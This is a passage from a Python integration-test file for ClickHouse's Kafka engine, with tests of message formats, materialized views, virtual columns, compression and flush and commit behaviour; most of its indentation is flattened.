kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
    # the first consumer subscribes to the topic, tries to poll some data, and goes idle
instance.query('SELECT * FROM test.kafka')
    # the second consumer does the same, leading to a rebalance in the first
    # consumer, and tries to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
    # the first consumer has a pending rebalance callback left unprocessed (no poll after the select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(120)
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(120)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27, e.displayText() = DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
    To trigger this regression there should be duplicated messages
    The original reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': 'localhost:9092'})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
    # Create batches of messages, each ~100 KB in size
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
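    # Wait until the 'flush' consumer group has committed offsets for all produced messages.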
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
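    # Background producer: each batch carries 101 messages (one more than kafka_max_block_size = 100);
    # i[0] counts the total number of messages produced.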
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
    # members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
    # members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
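    # Background producer: one message roughly every 0.8 s, so blocks are closed by the flush timeout
    # rather than by kafka_max_block_size.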
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
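    # Background producer: push single messages as fast as possible so the 100-row block fills up
    # well before the 120 s flush interval expires.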
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
    # Wait until the Kafka engine has consumed the data and the first part (all_1_1_0) has been flushed to test.view
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
    # More flushes can happen during the test; we only need to check the result of the first flush (the part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
    # 100 = the first poll should return 100 messages (and rows)
    # without waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
